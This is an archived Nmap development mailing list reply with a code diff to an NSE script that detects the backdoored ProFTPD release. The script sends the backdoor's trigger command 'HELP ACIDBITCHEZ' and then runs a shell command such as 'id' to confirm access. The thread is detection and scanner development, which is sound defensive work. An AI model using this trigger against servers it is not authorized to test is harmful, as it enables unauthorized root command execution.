Nmap Development mailing list archives
Re: [NSE] Detection of ProFTPD backdoor
From: Michael Meyer <michael.meyer () greenbone net>
Date: Mon, 13 Dec 2010 10:57:31 +0100
*** David Fifield <david () bamsoftware com> wrote:
On Sat, Dec 11, 2010 at 09:50:04AM +0100, Michael Meyer wrote:
+ sock:send("help foo\r\n") + sock:receive_lines(1)Does it also work without the sock:send line?
Yes.
What about using the read_reply function from ftp-anon.nse, does that work?
Yes, the following seems to work. --- /tmp/2/nmap/scripts/ftp-proftpd-backdoor.nse 2010-12-08 14:09:07.000000000 +0100 +++ /usr/local/share/nmap/scripts/ftp-proftpd-backdoor.nse 2010-12-13 11:06:56.000000000 +0100 @@ -35,6 +35,45 @@ local CMD_FTP = "HELP ACIDBITCHEZ" local CMD_SHELL = "id" +local function read_reply(buffer) + local readline + local line, err + local code, message + local _, p, tmp + + line, err = buffer() + if not line then + return line, err + end + + -- Single-line response? + code, message = string.match(line, "^(%d%d%d) (.*)$") + if code then + return tonumber(code), message + end + + -- Multi-line response? + _, p, code, message = string.find(line, "^(%d%d%d)-(.*)$") + if p then + while true do + line, err = buffer() + if not line then + return line, err + end + tmp = string.match(line, "^%d%d%d (.*)$") + if tmp then + message = message .. "\n" .. tmp + break + end + message = message .. "\n" .. line + end + + return tonumber(code), message + end + + return nil, string.format("Unparseable response: %q", line) +end + portrule = function (host, port) -- Check if version detection knows what FTP server this is. if port.version.product ~= nil and port.version.product ~= "ProFTPD" then @@ -82,15 +121,16 @@ return end - -- Send command to escalate privilege. - status, err = sock:send(CMD_FTP .. "\r\n") - if not status then - stdnse.print_debug(1, "Failed to send privilege escalation command: %s", err) - sock:close() - return - end + -- Send command to escalate privilege. + buffer = stdnse.make_buffer(sock, "\r\n") + status, err = sock:send(CMD_FTP .. "\r\n") + if not status then + return status, err + end + code, message = read_reply(buffer) -- Send command(s) to shell, assuming that privilege escalation worked. status, err = sock:send(cmd .. ";\r\n") if not status then stdnse.print_debug(1, "Failed to send shell command(s): %s", err) ------------------------------------------------------------------------------------ Micha _______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- Re: [NSE] Detection of ProFTPD backdoor, (continued)
- Re: [NSE] Detection of ProFTPD backdoor Kris Katterjohn (Dec 06)
- Re: [NSE] Detection of ProFTPD backdoor Mak Kolybabi (Dec 07)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 07)
- Re: [NSE] Detection of ProFTPD backdoor Kris Katterjohn (Dec 06)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 07)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 07)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 08)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 08)
- Re: [NSE] Detection of ProFTPD backdoor Mak Kolybabi (Dec 10)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 11)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 12)
- Re: [NSE] Detection of ProFTPD backdoor Michael Meyer (Dec 13)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 29)
- Re: [NSE] Detection of ProFTPD backdoor David Fifield (Dec 07)